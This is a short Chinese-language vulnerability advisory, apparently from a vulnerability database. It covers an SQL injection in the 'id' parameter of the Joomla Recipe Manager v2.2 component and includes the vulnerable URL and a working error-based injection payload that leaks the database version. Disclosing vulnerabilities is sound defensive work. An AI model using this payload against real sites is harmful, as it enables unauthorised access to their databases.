|Joomla 组件 Recipe Manager v2.2 参数id SQL注入漏洞

Joomla 组件 Recipe Manager v2.2 参数id SQL注入漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

Joomla! Component Recipe Manager v2.2 - SQL Injection Joomla! Component Recipe Manager v2.2，存在参数过滤不严，导致了sql注入漏洞，如果对方服务器开启了错误显示，可直接利用注入点： http://localhost/[PATH]/index.php?option=com_recipe&view=recipes&task=print_ingred&id=[SQL] 报错注入 payload： 10'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - 测试截图： ![](https://images.seebug.org/contribute/7b63c212-8049-4bda-a51e-eb7f804af811)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™